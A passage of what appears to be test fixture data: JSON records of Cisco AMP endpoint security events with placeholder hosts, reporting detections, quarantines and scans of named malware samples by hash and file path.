malware","event_type_id":1107296272,"detection":"W32.Variant:Stabuniq.15nx.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704800,"start_date":"2021-01-15T10:00:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207750431900000,"timestamp":1610704800,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207750431899653","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":445000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":414000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":3276,"disposition":"Malicious","file_name":"stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254540350751000,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254540350750721","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159246968074797000,"timestamp":1610704800,"timestamp_nanoseconds":355000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159246968074797057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3372C1EDAB46837F1E973164FA2D72","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\3372C1EDAB46837F1E973164FA2D72","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663665717641000,"timestamp":1610704800,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663665717641217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827054281638806000,"timestamp":1610704800,"timestamp_nanoseconds":664000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1335,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265790660805000,"timestamp":1610704800,"timestamp_nanoseconds":44000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614900658962000,"timestamp":1610704800,"timestamp_nanoseconds":406000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707183856779000,"timestamp":1610704800,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363037310321000,"timestamp":1610704800,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":189474725,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 